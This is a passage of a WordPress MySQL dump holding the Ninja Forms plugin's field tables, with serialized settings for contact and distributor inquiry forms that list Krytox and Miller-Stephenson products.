INSERT INTO `wp_ninja_forms_fav_fields` VALUES (15, 0, '_text', 0, 'a:25:{s:5:"label";s:5:"Phone";s:9:"label_pos";s:5:"above";s:13:"default_value";s:0:"";s:4:"mask";s:14:"(999) 999-9999";s:10:"datepicker";s:1:"0";s:5:"email";s:1:"0";s:10:"send_email";s:1:"0";s:10:"from_email";s:1:"0";s:10:"first_name";s:1:"0";s:9:"last_name";s:1:"0";s:9:"from_name";s:1:"0";s:14:"user_address_1";s:1:"0";s:14:"user_address_2";s:1:"0";s:9:"user_city";s:1:"0";s:8:"user_zip";s:1:"0";s:10:"user_phone";s:1:"1";s:10:"user_email";s:1:"0";s:21:"user_info_field_group";s:1:"1";s:3:"req";s:1:"0";s:5:"class";s:0:"";s:9:"show_help";s:1:"0";s:9:"help_text";s:0:"";s:17:"calc_auto_include";s:1:"0";s:11:"calc_option";s:1:"0";s:11:"conditional";s:0:"";}', 'Phone'); 
INSERT INTO `wp_ninja_forms_fav_fields` VALUES (16, 0, '_calc', 0, 'a:20:{s:9:"calc_name";s:9:"sub_total";s:13:"default_value";s:0:"";s:17:"calc_display_type";s:4:"text";s:5:"label";s:9:"Sub Total";s:9:"label_pos";s:5:"above";s:26:"calc_display_text_disabled";s:1:"1";s:17:"calc_display_html";s:26:"<p>[ninja_forms_calc]</p>\n";s:5:"class";s:0:"";s:9:"show_help";s:1:"0";s:9:"help_text";s:0:"";s:11:"calc_method";s:4:"auto";s:4:"calc";s:0:"";s:7:"calc_eq";s:0:"";s:19:"payment_field_group";s:1:"1";s:13:"payment_total";s:1:"0";s:17:"payment_sub_total";s:1:"1";s:11:"calc_places";s:1:"2";s:17:"calc_auto_include";s:1:"0";s:11:"calc_option";s:1:"0";s:11:"conditional";s:0:"";}', 'Sub Total'); 
INSERT INTO `wp_ninja_forms_fav_fields` VALUES (17, 0, '_calc', 0, 'a:20:{s:9:"calc_name";s:5:"total";s:13:"default_value";s:0:"";s:17:"calc_display_type";s:4:"text";s:5:"label";s:5:"Total";s:9:"label_pos";s:5:"above";s:26:"calc_display_text_disabled";s:1:"1";s:17:"calc_display_html";s:26:"<p>[ninja_forms_calc]</p>\n";s:5:"class";s:0:"";s:9:"show_help";s:1:"0";s:9:"help_text";s:0:"";s:11:"calc_method";s:4:"auto";s:4:"calc";a:5:{i:0;a:2:{s:2:"op";s:3:"add";s:5:"field";s:2:"70";}i:1;a:2:{s:2:"op";s:3:"add";s:5:"field";s:2:"69";}i:2;a:2:{s:2:"op";s:3:"add";s:5:"field";s:2:"15";}i:3;a:2:{s:2:"op";s:3:"add";s:5:"field";s:2:"61";}i:4;a:2:{s:2:"op";s:3:"add";s:5:"field";s:2:"70";}}s:7:"calc_eq";s:5:"5 + 5";s:19:"payment_field_group";s:1:"1";s:13:"payment_total";s:1:"1";s:17:"payment_sub_total";s:1:"0";s:11:"calc_places";s:1:"2";s:17:"calc_auto_include";s:1:"0";s:11:"calc_option";s:1:"0";s:11:"conditional";s:0:"";}', 'Total'); 
INSERT INTO `wp_ninja_forms_fav_fields` VALUES (92, 0, '_credit_card', 0, 'a:6:{s:5:"label";s:11:"Credit Card";s:19:"payment_field_group";s:1:"1";s:3:"req";s:1:"0";s:9:"show_help";s:1:"0";s:9:"help_text";s:0:"";s:11:"conditional";s:0:"";}', 'Credit Card');
#
# End of data contents of table `wp_ninja_forms_fav_fields`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_ninja_forms_fields`


#
# Delete any existing table `wp_ninja_forms_fields`
#

DROP TABLE IF EXISTS `wp_ninja_forms_fields`;


#
# Table structure of table `wp_ninja_forms_fields`
#

CREATE TABLE `wp_ninja_forms_fields` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `form_id` int(11) NOT NULL,
  `type` varchar(255) NOT NULL,
  `order` int(11) NOT NULL,
  `data` longtext NOT NULL,
  `fav_id` int(11) DEFAULT NULL,
  `def_id` int(11) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=50 DEFAULT CHARSET=utf8 ;

#
# Data contents of table `wp_ninja_forms_fields`
#
 
INSERT INTO `wp_ninja_forms_fields` VALUES (1, 1, '_text', 1, 'a:36:{s:5:"label";s:4:"Name";s:9:"label_pos";s:5:"above";s:13:"default_value";s:0:"";s:4:"mask";s:0:"";s:10:"datepicker";s:1:"0";s:5:"email";s:1:"0";s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";s:9:"from_name";s:1:"0";s:14:"user_address_1";s:0:"";s:14:"user_address_2";s:0:"";s:9:"user_city";s:0:"";s:8:"user_zip";s:0:"";s:10:"user_phone";s:0:"";s:10:"user_email";s:0:"";s:21:"user_info_field_group";s:0:"";s:3:"req";s:1:"1";s:5:"class";s:0:"";s:9:"show_help";s:1:"0";s:9:"help_text";s:0:"";s:9:"show_desc";s:1:"0";s:8:"desc_pos";s:4:"none";s:9:"desc_text";s:0:"";s:17:"calc_auto_include";s:1:"0";s:11:"placeholder";s:0:"";s:13:"disable_input";s:1:"0";s:11:"input_limit";s:0:"";s:16:"input_limit_type";s:4:"char";s:15:"input_limit_msg";s:0:"";s:10:"user_state";s:1:"0";s:16:"autocomplete_off";s:1:"0";s:8:"num_sort";s:1:"0";s:18:"default_value_type";s:0:"";s:11:"admin_label";s:0:"";s:26:"user_info_field_group_name";s:0:"";s:28:"user_info_field_group_custom";s:0:"";}', 0, 0); 
INSERT INTO `wp_ninja_forms_fields` VALUES (2, 1, '_text', 3, 'a:28:{s:5:"label";s:5:"Email";s:9:"label_pos";s:5:"above";s:13:"default_value";s:0:"";s:4:"mask";s:0:"";s:10:"datepicker";s:1:"0";s:5:"email";s:1:"1";s:10:"first_name";s:1:"0";s:9:"last_name";s:1:"0";s:9:"from_name";s:1:"0";s:14:"user_address_1";s:1:"0";s:14:"user_address_2";s:1:"0";s:9:"user_city";s:1:"0";s:8:"user_zip";s:1:"0";s:10:"user_phone";s:1:"0";s:10:"user_email";s:1:"1";s:21:"user_info_field_group";s:1:"1";s:3:"req";s:1:"1";s:5:"class";s:0:"";s:9:"show_help";s:1:"0";s:9:"help_text";s:0:"";s:17:"calc_auto_include";s:1:"0";s:11:"calc_option";s:1:"0";s:11:"conditional";s:0:"";s:26:"user_info_field_group_name";s:0:"";s:28:"user_info_field_group_custom";s:0:"";s:9:"show_desc";s:1:"0";s:8:"desc_pos";s:4:"none";s:9:"desc_text";s:0:"";}', 0, 14); 
INSERT INTO `wp_ninja_forms_fields` VALUES (3, 1, '_textarea', 5, 'a:14:{s:5:"label";s:7:"Message";s:9:"label_pos";s:5:"above";s:13:"default_value";s:0:"";s:12:"textarea_rte";s:1:"0";s:14:"textarea_media";s:1:"0";s:18:"disable_rte_mobile";s:1:"0";s:3:"req";s:1:"1";s:5:"class";s:0:"";s:9:"show_help";s:1:"0";s:9:"help_text";s:0:"";s:9:"show_desc";s:1:"0";s:8:"desc_pos";s:4:"none";s:9:"desc_text";s:0:"";s:17:"calc_auto_include";s:1:"0";}', 0, 0); 
INSERT INTO `wp_ninja_forms_fields` VALUES (4, 1, '_submit', 6, 'a:7:{s:5:"label";s:4:"Send";s:5:"class";s:0:"";s:9:"show_help";s:1:"0";s:9:"help_text";s:0:"";s:9:"show_desc";s:1:"0";s:8:"desc_pos";s:4:"none";s:9:"desc_text";s:0:"";}', 0, 0); 
INSERT INTO `wp_ninja_forms_fields` VALUES (8, 1, '_text', 4, 'a:40:{s:5:"label";s:5:"Phone";s:9:"label_pos";s:5:"above";s:13:"default_value";s:0:"";s:4:"mask";s:14:"(999) 999-9999";s:10:"datepicker";s:1:"0";s:5:"email";s:1:"0";s:10:"send_email";s:1:"0";s:10:"from_email";s:1:"0";s:10:"first_name";s:1:"0";s:9:"last_name";s:1:"0";s:9:"from_name";s:1:"0";s:14:"user_address_1";s:1:"0";s:14:"user_address_2";s:1:"0";s:9:"user_city";s:1:"0";s:8:"user_zip";s:1:"0";s:10:"user_phone";s:1:"1";s:10:"user_email";s:1:"0";s:21:"user_info_field_group";s:1:"1";s:3:"req";s:1:"0";s:5:"class";s:0:"";s:9:"show_help";s:1:"0";s:9:"help_text";s:0:"";s:17:"calc_auto_include";s:1:"0";s:11:"calc_option";s:1:"0";s:11:"conditional";s:0:"";s:11:"placeholder";s:0:"";s:13:"disable_input";s:1:"0";s:11:"input_limit";s:0:"";s:16:"input_limit_type";s:4:"char";s:15:"input_limit_msg";s:0:"";s:10:"user_state";s:1:"0";s:16:"autocomplete_off";s:1:"0";s:8:"num_sort";s:1:"0";s:18:"default_value_type";s:0:"";s:11:"admin_label";s:0:"";s:26:"user_info_field_group_name";s:0:"";s:28:"user_info_field_group_custom";s:0:"";s:9:"show_desc";s:1:"0";s:8:"desc_pos";s:4:"none";s:9:"desc_text";s:0:"";}', NULL, 15); 
INSERT INTO `wp_ninja_forms_fields` VALUES (10, 1, '_text', 2, 'a:35:{s:5:"label";s:7:"Company";s:15:"input_limit_msg";s:17:"character(s) left";s:9:"label_pos";s:5:"above";s:11:"placeholder";s:0:"";s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";s:14:"user_address_1";s:0:"";s:14:"user_address_2";s:0:"";s:9:"user_city";s:0:"";s:8:"user_zip";s:0:"";s:10:"user_phone";s:0:"";s:10:"user_email";s:0:"";s:21:"user_info_field_group";s:1:"1";s:5:"email";s:1:"0";s:13:"disable_input";s:1:"0";s:3:"req";s:1:"0";s:4:"mask";s:0:"";s:11:"input_limit";s:0:"";s:16:"input_limit_type";s:4:"char";s:17:"calc_auto_include";s:1:"0";s:10:"datepicker";s:1:"0";s:10:"user_state";s:1:"0";s:16:"autocomplete_off";s:1:"0";s:8:"num_sort";s:1:"0";s:18:"default_value_type";s:0:"";s:13:"default_value";s:0:"";s:11:"admin_label";s:0:"";s:26:"user_info_field_group_name";s:0:"";s:28:"user_info_field_group_custom";s:0:"";s:5:"class";s:0:"";s:9:"show_help";s:1:"0";s:9:"help_text";s:0:"";s:9:"show_desc";s:1:"0";s:8:"desc_pos";s:4:"none";s:9:"desc_text";s:0:"";}', NULL, NULL); 
INSERT INTO `wp_ninja_forms_fields` VALUES (12, 11, '_text', 0, 'a:24:{s:5:"label";s:4:"Name";s:9:"label_pos";s:5:"above";s:13:"default_value";s:0:"";s:4:"mask";s:0:"";s:10:"datepicker";s:1:"0";s:5:"email";s:1:"0";s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";s:9:"from_name";s:1:"0";s:14:"user_address_1";s:0:"";s:14:"user_address_2";s:0:"";s:9:"user_city";s:0:"";s:8:"user_zip";s:0:"";s:10:"user_phone";s:0:"";s:10:"user_email";s:0:"";s:21:"user_info_field_group";s:0:"";s:3:"req";s:1:"1";s:5:"class";s:0:"";s:9:"show_help";s:1:"0";s:9:"help_text";s:0:"";s:9:"show_desc";s:1:"0";s:8:"desc_pos";s:4:"none";s:9:"desc_text";s:0:"";s:17:"calc_auto_include";s:1:"0";}', 0, 0); 
INSERT INTO `wp_ninja_forms_fields` VALUES (13, 11, '_text', 1, 'a:35:{s:5:"label";s:7:"Company";s:15:"input_limit_msg";s:17:"character(s) left";s:9:"label_pos";s:5:"above";s:11:"placeholder";s:0:"";s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";s:14:"user_address_1";s:0:"";s:14:"user_address_2";s:0:"";s:9:"user_city";s:0:"";s:8:"user_zip";s:0:"";s:10:"user_phone";s:0:"";s:10:"user_email";s:0:"";s:21:"user_info_field_group";s:1:"1";s:5:"email";s:1:"0";s:13:"disable_input";s:1:"0";s:3:"req";s:1:"0";s:4:"mask";s:0:"";s:11:"input_limit";s:0:"";s:16:"input_limit_type";s:4:"char";s:17:"calc_auto_include";s:1:"0";s:10:"datepicker";s:1:"0";s:10:"user_state";s:1:"0";s:16:"autocomplete_off";s:1:"0";s:8:"num_sort";s:1:"0";s:18:"default_value_type";s:0:"";s:13:"default_value";s:0:"";s:11:"admin_label";s:0:"";s:26:"user_info_field_group_name";s:0:"";s:28:"user_info_field_group_custom";s:0:"";s:5:"class";s:0:"";s:9:"show_help";s:1:"0";s:9:"help_text";s:0:"";s:9:"show_desc";s:1:"0";s:8:"desc_pos";s:4:"none";s:9:"desc_text";s:0:"";}', NULL, NULL); 
INSERT INTO `wp_ninja_forms_fields` VALUES (14, 11, '_text', 3, 'a:28:{s:5:"label";s:5:"Email";s:9:"label_pos";s:5:"above";s:13:"default_value";s:0:"";s:4:"mask";s:0:"";s:10:"datepicker";s:1:"0";s:5:"email";s:1:"1";s:10:"first_name";s:1:"0";s:9:"last_name";s:1:"0";s:9:"from_name";s:1:"0";s:14:"user_address_1";s:1:"0";s:14:"user_address_2";s:1:"0";s:9:"user_city";s:1:"0";s:8:"user_zip";s:1:"0";s:10:"user_phone";s:1:"0";s:10:"user_email";s:1:"1";s:21:"user_info_field_group";s:1:"1";s:3:"req";s:1:"1";s:5:"class";s:0:"";s:9:"show_help";s:1:"0";s:9:"help_text";s:0:"";s:17:"calc_auto_include";s:1:"0";s:11:"calc_option";s:1:"0";s:11:"conditional";s:0:"";s:26:"user_info_field_group_name";s:0:"";s:28:"user_info_field_group_custom";s:0:"";s:9:"show_desc";s:1:"0";s:8:"desc_pos";s:4:"none";s:9:"desc_text";s:0:"";}', 0, 14); 
INSERT INTO `wp_ninja_forms_fields` VALUES (15, 11, '_text', 4, 'a:38:{s:5:"label";s:5:"Phone";s:9:"label_pos";s:5:"above";s:13:"default_value";s:0:"";s:4:"mask";s:14:"(999) 999-9999";s:10:"datepicker";s:1:"0";s:5:"email";s:1:"0";s:10:"first_name";s:1:"0";s:9:"last_name";s:1:"0";s:9:"from_name";s:1:"0";s:14:"user_address_1";s:1:"0";s:14:"user_address_2";s:1:"0";s:9:"user_city";s:1:"0";s:8:"user_zip";s:1:"0";s:10:"user_phone";s:1:"1";s:10:"user_email";s:1:"0";s:21:"user_info_field_group";s:1:"1";s:3:"req";s:1:"0";s:5:"class";s:0:"";s:9:"show_help";s:1:"0";s:9:"help_text";s:0:"";s:17:"calc_auto_include";s:1:"0";s:11:"calc_option";s:1:"0";s:11:"conditional";s:0:"";s:11:"placeholder";s:0:"";s:13:"disable_input";s:1:"0";s:11:"input_limit";s:0:"";s:16:"input_limit_type";s:4:"char";s:15:"input_limit_msg";s:0:"";s:10:"user_state";s:1:"0";s:16:"autocomplete_off";s:1:"0";s:8:"num_sort";s:1:"0";s:18:"default_value_type";s:0:"";s:11:"admin_label";s:0:"";s:26:"user_info_field_group_name";s:0:"";s:28:"user_info_field_group_custom";s:0:"";s:9:"show_desc";s:1:"0";s:8:"desc_pos";s:4:"none";s:9:"desc_text";s:0:"";}', NULL, 15); 
INSERT INTO `wp_ninja_forms_fields` VALUES (16, 11, '_textarea', 5, 'a:14:{s:5:"label";s:7:"Message";s:9:"label_pos";s:5:"above";s:13:"default_value";s:0:"";s:12:"textarea_rte";s:1:"0";s:14:"textarea_media";s:1:"0";s:18:"disable_rte_mobile";s:1:"0";s:3:"req";s:1:"1";s:5:"class";s:0:"";s:9:"show_help";s:1:"0";s:9:"help_text";s:0:"";s:9:"show_desc";s:1:"0";s:8:"desc_pos";s:4:"none";s:9:"desc_text";s:0:"";s:17:"calc_auto_include";s:1:"0";}', 0, 0); 
INSERT INTO `wp_ninja_forms_fields` VALUES (17, 11, '_submit', 6, 'a:7:{s:5:"label";s:4:"Send";s:5:"class";s:0:"";s:9:"show_help";s:1:"0";s:9:"help_text";s:0:"";s:9:"show_desc";s:1:"0";s:8:"desc_pos";s:4:"none";s:9:"desc_text";s:0:"";}', 0, 0); 
INSERT INTO `wp_ninja_forms_fields` VALUES (18, 11, '_text', 2, 'a:35:{s:5:"label";s:19:"Current Customer #:";s:15:"input_limit_msg";s:17:"character(s) left";s:9:"label_pos";s:5:"above";s:11:"placeholder";s:0:"";s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";s:14:"user_address_1";s:0:"";s:14:"user_address_2";s:0:"";s:9:"user_city";s:0:"";s:8:"user_zip";s:0:"";s:10:"user_phone";s:0:"";s:10:"user_email";s:0:"";s:21:"user_info_field_group";s:1:"1";s:5:"email";s:1:"0";s:13:"disable_input";s:1:"0";s:3:"req";s:1:"0";s:4:"mask";s:0:"";s:11:"input_limit";s:0:"";s:16:"input_limit_type";s:4:"char";s:17:"calc_auto_include";s:1:"0";s:10:"datepicker";s:1:"0";s:10:"user_state";s:1:"0";s:16:"autocomplete_off";s:1:"0";s:8:"num_sort";s:1:"0";s:18:"default_value_type";s:0:"";s:13:"default_value";s:0:"";s:11:"admin_label";s:0:"";s:26:"user_info_field_group_name";s:0:"";s:28:"user_info_field_group_custom";s:0:"";s:5:"class";s:0:"";s:9:"show_help";s:1:"0";s:9:"help_text";s:0:"";s:9:"show_desc";s:1:"0";s:8:"desc_pos";s:4:"none";s:9:"desc_text";s:0:"";}', NULL, NULL); 
INSERT INTO `wp_ninja_forms_fields` VALUES (26, 1, '_desc', 0, 'a:8:{s:5:"label";s:4:"Text";s:15:"input_limit_msg";s:17:"character(s) left";s:13:"default_value";s:60:"<BR>\r\nPlease Fill out the form below for further info:\r\n<BR>";s:7:"desc_el";s:3:"div";s:5:"class";s:0:"";s:9:"show_desc";s:1:"0";s:8:"desc_pos";s:4:"none";s:9:"desc_text";s:0:"";}', NULL, NULL); 
INSERT INTO `wp_ninja_forms_fields` VALUES (33, 18, '_text', 0, 'a:40:{s:5:"label";s:10:"First Name";s:9:"label_pos";s:5:"above";s:13:"default_value";s:0:"";s:4:"mask";s:0:"";s:10:"datepicker";s:1:"0";s:5:"email";s:1:"0";s:10:"send_email";s:1:"0";s:10:"from_email";s:1:"0";s:10:"first_name";s:1:"1";s:9:"last_name";s:1:"0";s:9:"from_name";s:1:"0";s:21:"user_info_field_group";s:1:"1";s:3:"req";s:1:"1";s:5:"class";s:0:"";s:9:"show_help";s:1:"0";s:9:"help_text";s:0:"";s:17:"calc_auto_include";s:1:"0";s:11:"calc_option";s:1:"0";s:11:"conditional";s:0:"";s:11:"placeholder";s:0:"";s:14:"user_address_1";s:0:"";s:14:"user_address_2";s:0:"";s:9:"user_city";s:0:"";s:8:"user_zip";s:0:"";s:10:"user_phone";s:0:"";s:10:"user_email";s:0:"";s:13:"disable_input";s:1:"0";s:11:"input_limit";s:0:"";s:16:"input_limit_type";s:4:"char";s:15:"input_limit_msg";s:0:"";s:10:"user_state";s:1:"0";s:16:"autocomplete_off";s:1:"0";s:8:"num_sort";s:1:"0";s:18:"default_value_type";s:0:"";s:11:"admin_label";s:0:"";s:26:"user_info_field_group_name";s:0:"";s:28:"user_info_field_group_custom";s:0:"";s:9:"show_desc";s:1:"0";s:8:"desc_pos";s:4:"none";s:9:"desc_text";s:0:"";}', NULL, 6); 
INSERT INTO `wp_ninja_forms_fields` VALUES (34, 18, '_text', 1, 'a:40:{s:5:"label";s:9:"Last Name";s:9:"label_pos";s:5:"above";s:13:"default_value";s:0:"";s:4:"mask";s:0:"";s:10:"datepicker";s:1:"0";s:5:"email";s:1:"0";s:10:"send_email";s:1:"0";s:10:"from_email";s:1:"0";s:10:"first_name";s:1:"0";s:9:"last_name";s:1:"1";s:9:"from_name";s:1:"0";s:21:"user_info_field_group";s:1:"1";s:3:"req";s:1:"1";s:5:"class";s:0:"";s:9:"show_help";s:1:"0";s:9:"help_text";s:0:"";s:17:"calc_auto_include";s:1:"0";s:11:"calc_option";s:1:"0";s:11:"conditional";s:0:"";s:11:"placeholder";s:0:"";s:14:"user_address_1";s:0:"";s:14:"user_address_2";s:0:"";s:9:"user_city";s:0:"";s:8:"user_zip";s:0:"";s:10:"user_phone";s:0:"";s:10:"user_email";s:0:"";s:13:"disable_input";s:1:"0";s:11:"input_limit";s:0:"";s:16:"input_limit_type";s:4:"char";s:15:"input_limit_msg";s:0:"";s:10:"user_state";s:1:"0";s:16:"autocomplete_off";s:1:"0";s:8:"num_sort";s:1:"0";s:18:"default_value_type";s:0:"";s:11:"admin_label";s:0:"";s:26:"user_info_field_group_name";s:0:"";s:28:"user_info_field_group_custom";s:0:"";s:9:"show_desc";s:1:"0";s:8:"desc_pos";s:4:"none";s:9:"desc_text";s:0:"";}', NULL, 7); 
INSERT INTO `wp_ninja_forms_fields` VALUES (35, 18, '_text', 2, 'a:40:{s:5:"label";s:7:"Company";s:9:"label_pos";s:5:"above";s:13:"default_value";s:0:"";s:4:"mask";s:0:"";s:10:"datepicker";s:1:"0";s:5:"email";s:1:"0";s:10:"send_email";s:1:"0";s:10:"from_email";s:1:"0";s:10:"first_name";s:1:"1";s:9:"last_name";s:1:"0";s:9:"from_name";s:1:"0";s:21:"user_info_field_group";s:1:"1";s:3:"req";s:1:"1";s:5:"class";s:0:"";s:9:"show_help";s:1:"0";s:9:"help_text";s:0:"";s:17:"calc_auto_include";s:1:"0";s:11:"calc_option";s:1:"0";s:11:"conditional";s:0:"";s:11:"placeholder";s:0:"";s:14:"user_address_1";s:0:"";s:14:"user_address_2";s:0:"";s:9:"user_city";s:0:"";s:8:"user_zip";s:0:"";s:10:"user_phone";s:0:"";s:10:"user_email";s:0:"";s:13:"disable_input";s:1:"0";s:11:"input_limit";s:0:"";s:16:"input_limit_type";s:4:"char";s:15:"input_limit_msg";s:0:"";s:10:"user_state";s:1:"0";s:16:"autocomplete_off";s:1:"0";s:8:"num_sort";s:1:"0";s:18:"default_value_type";s:0:"";s:11:"admin_label";s:0:"";s:26:"user_info_field_group_name";s:0:"";s:28:"user_info_field_group_custom";s:0:"";s:9:"show_desc";s:1:"0";s:8:"desc_pos";s:4:"none";s:9:"desc_text";s:0:"";}', NULL, 6); 
INSERT INTO `wp_ninja_forms_fields` VALUES (36, 18, '_text', 3, 'a:40:{s:5:"label";s:8:"Industry";s:9:"label_pos";s:5:"above";s:13:"default_value";s:0:"";s:4:"mask";s:0:"";s:10:"datepicker";s:1:"0";s:5:"email";s:1:"0";s:10:"send_email";s:1:"0";s:10:"from_email";s:1:"0";s:10:"first_name";s:1:"1";s:9:"last_name";s:1:"0";s:9:"from_name";s:1:"0";s:21:"user_info_field_group";s:1:"1";s:3:"req";s:1:"1";s:5:"class";s:0:"";s:9:"show_help";s:1:"0";s:9:"help_text";s:0:"";s:17:"calc_auto_include";s:1:"0";s:11:"calc_option";s:1:"0";s:11:"conditional";s:0:"";s:11:"placeholder";s:0:"";s:14:"user_address_1";s:0:"";s:14:"user_address_2";s:0:"";s:9:"user_city";s:0:"";s:8:"user_zip";s:0:"";s:10:"user_phone";s:0:"";s:10:"user_email";s:0:"";s:13:"disable_input";s:1:"0";s:11:"input_limit";s:0:"";s:16:"input_limit_type";s:4:"char";s:15:"input_limit_msg";s:0:"";s:10:"user_state";s:1:"0";s:16:"autocomplete_off";s:1:"0";s:8:"num_sort";s:1:"0";s:18:"default_value_type";s:0:"";s:11:"admin_label";s:0:"";s:26:"user_info_field_group_name";s:0:"";s:28:"user_info_field_group_custom";s:0:"";s:9:"show_desc";s:1:"0";s:8:"desc_pos";s:4:"none";s:9:"desc_text";s:0:"";}', NULL, 6); 
INSERT INTO `wp_ninja_forms_fields` VALUES (37, 18, '_text', 9, 'a:40:{s:5:"label";s:5:"Email";s:9:"label_pos";s:5:"above";s:13:"default_value";s:0:"";s:4:"mask";s:0:"";s:10:"datepicker";s:1:"0";s:5:"email";s:1:"1";s:10:"send_email";s:1:"0";s:10:"from_email";s:1:"0";s:10:"first_name";s:1:"0";s:9:"last_name";s:1:"0";s:9:"from_name";s:1:"0";s:14:"user_address_1";s:1:"0";s:14:"user_address_2";s:1:"0";s:9:"user_city";s:1:"0";s:8:"user_zip";s:1:"0";s:10:"user_phone";s:1:"0";s:10:"user_email";s:1:"1";s:21:"user_info_field_group";s:1:"1";s:3:"req";s:1:"1";s:5:"class";s:0:"";s:9:"show_help";s:1:"0";s:9:"help_text";s:0:"";s:17:"calc_auto_include";s:1:"0";s:11:"calc_option";s:1:"0";s:11:"conditional";s:0:"";s:11:"placeholder";s:0:"";s:13:"disable_input";s:1:"0";s:11:"input_limit";s:0:"";s:16:"input_limit_type";s:4:"char";s:15:"input_limit_msg";s:0:"";s:10:"user_state";s:1:"0";s:16:"autocomplete_off";s:1:"0";s:8:"num_sort";s:1:"0";s:18:"default_value_type";s:0:"";s:11:"admin_label";s:0:"";s:26:"user_info_field_group_name";s:0:"";s:28:"user_info_field_group_custom";s:0:"";s:9:"show_desc";s:1:"0";s:8:"desc_pos";s:4:"none";s:9:"desc_text";s:0:"";}', NULL, 14); 
INSERT INTO `wp_ninja_forms_fields` VALUES (38, 18, '_text', 10, 'a:40:{s:5:"label";s:5:"Phone";s:9:"label_pos";s:5:"above";s:13:"default_value";s:0:"";s:4:"mask";s:14:"(999) 999-9999";s:10:"datepicker";s:1:"0";s:5:"email";s:1:"0";s:10:"send_email";s:1:"0";s:10:"from_email";s:1:"0";s:10:"first_name";s:1:"0";s:9:"last_name";s:1:"0";s:9:"from_name";s:1:"0";s:14:"user_address_1";s:1:"0";s:14:"user_address_2";s:1:"0";s:9:"user_city";s:1:"0";s:8:"user_zip";s:1:"0";s:10:"user_phone";s:1:"1";s:10:"user_email";s:1:"0";s:21:"user_info_field_group";s:1:"1";s:3:"req";s:1:"1";s:5:"class";s:0:"";s:9:"show_help";s:1:"0";s:9:"help_text";s:0:"";s:17:"calc_auto_include";s:1:"0";s:11:"calc_option";s:1:"0";s:11:"conditional";s:0:"";s:11:"placeholder";s:0:"";s:13:"disable_input";s:1:"0";s:11:"input_limit";s:0:"";s:16:"input_limit_type";s:4:"char";s:15:"input_limit_msg";s:0:"";s:10:"user_state";s:1:"0";s:16:"autocomplete_off";s:1:"0";s:8:"num_sort";s:1:"0";s:18:"default_value_type";s:0:"";s:11:"admin_label";s:0:"";s:26:"user_info_field_group_name";s:0:"";s:28:"user_info_field_group_custom";s:0:"";s:9:"show_desc";s:1:"0";s:8:"desc_pos";s:4:"none";s:9:"desc_text";s:0:"";}', NULL, 15); 
INSERT INTO `wp_ninja_forms_fields` VALUES (39, 18, '_text', 11, 'a:40:{s:5:"label";s:7:"Address";s:9:"label_pos";s:5:"above";s:13:"default_value";s:0:"";s:4:"mask";s:0:"";s:10:"datepicker";s:1:"0";s:5:"email";s:1:"0";s:10:"send_email";s:1:"0";s:10:"from_email";s:1:"0";s:10:"first_name";s:1:"0";s:9:"last_name";s:1:"0";s:9:"from_name";s:1:"0";s:14:"user_address_1";s:1:"1";s:14:"user_address_2";s:1:"0";s:9:"user_city";s:1:"0";s:8:"user_zip";s:1:"0";s:21:"user_info_field_group";s:1:"1";s:3:"req";s:1:"1";s:5:"class";s:0:"";s:9:"show_help";s:1:"0";s:9:"help_text";s:0:"";s:17:"calc_auto_include";s:1:"0";s:11:"calc_option";s:1:"0";s:11:"conditional";s:0:"";s:11:"placeholder";s:0:"";s:10:"user_phone";s:0:"";s:10:"user_email";s:0:"";s:13:"disable_input";s:1:"0";s:11:"input_limit";s:0:"";s:16:"input_limit_type";s:4:"char";s:15:"input_limit_msg";s:0:"";s:10:"user_state";s:1:"0";s:16:"autocomplete_off";s:1:"0";s:8:"num_sort";s:1:"0";s:18:"default_value_type";s:0:"";s:11:"admin_label";s:0:"";s:26:"user_info_field_group_name";s:0:"";s:28:"user_info_field_group_custom";s:0:"";s:9:"show_desc";s:1:"0";s:8:"desc_pos";s:4:"none";s:9:"desc_text";s:0:"";}', NULL, 8); 
INSERT INTO `wp_ninja_forms_fields` VALUES (43, 18, '_submit', 13, 'a:8:{s:5:"label";s:6:"Submit";s:15:"input_limit_msg";s:17:"character(s) left";s:5:"class";s:0:"";s:9:"show_help";s:1:"0";s:9:"help_text";s:0:"";s:9:"show_desc";s:1:"0";s:8:"desc_pos";s:4:"none";s:9:"desc_text";s:0:"";}', NULL, NULL); 
INSERT INTO `wp_ninja_forms_fields` VALUES (44, 18, '_list', 12, 'a:19:{s:5:"label";s:22:"Products to Distribute";s:15:"input_limit_msg";s:17:"character(s) left";s:9:"label_pos";s:4:"left";s:9:"list_type";s:8:"checkbox";s:10:"multi_size";s:1:"5";s:15:"list_show_value";s:1:"0";s:4:"list";a:1:{s:7:"options";a:7:{i:0;a:4:{s:5:"label";s:19:"Krytox GPL Products";s:5:"value";s:0:"";s:4:"calc";s:0:"";s:8:"selected";s:1:"0";}i:1;a:4:{s:5:"label";s:25:"Krytox Aerospace Products";s:5:"value";s:0:"";s:4:"calc";s:0:"";s:8:"selected";s:1:"0";}i:2;a:4:{s:5:"label";s:26:"Krytox Automotive Products";s:5:"value";s:0:"";s:4:"calc";s:0:"";s:8:"selected";s:1:"0";}i:3;a:4:{s:5:"label";s:21:"Other Krytox Products";s:5:"value";s:0:"";s:4:"calc";s:0:"";s:8:"selected";s:1:"0";}i:4;a:4:{s:5:"label";s:14:"Release Agents";s:5:"value";s:0:"";s:4:"calc";s:0:"";s:8:"selected";s:1:"0";}i:5;a:4:{s:5:"label";s:18:"Conformal Coatings";s:5:"value";s:0:"";s:4:"calc";s:0:"";s:8:"selected";s:1:"0";}i:6;a:4:{s:5:"label";s:32:"Other Miller-Stephenson Products";s:5:"value";s:0:"";s:4:"calc";s:0:"";s:8:"selected";s:1:"0";}}}s:21:"user_info_field_group";s:0:"";s:3:"req";s:1:"0";s:17:"calc_auto_include";s:1:"0";s:10:"user_state";s:1:"0";s:8:"num_sort";s:1:"0";s:11:"admin_label";s:0:"";s:5:"class";s:0:"";s:9:"show_help";s:1:"0";s:9:"help_text";s:0:"";s:9:"show_desc";s:1:"0";s:8:"desc_pos";s:4:"none";s:9:"desc_text";s:0:"";}', NULL, NULL); 
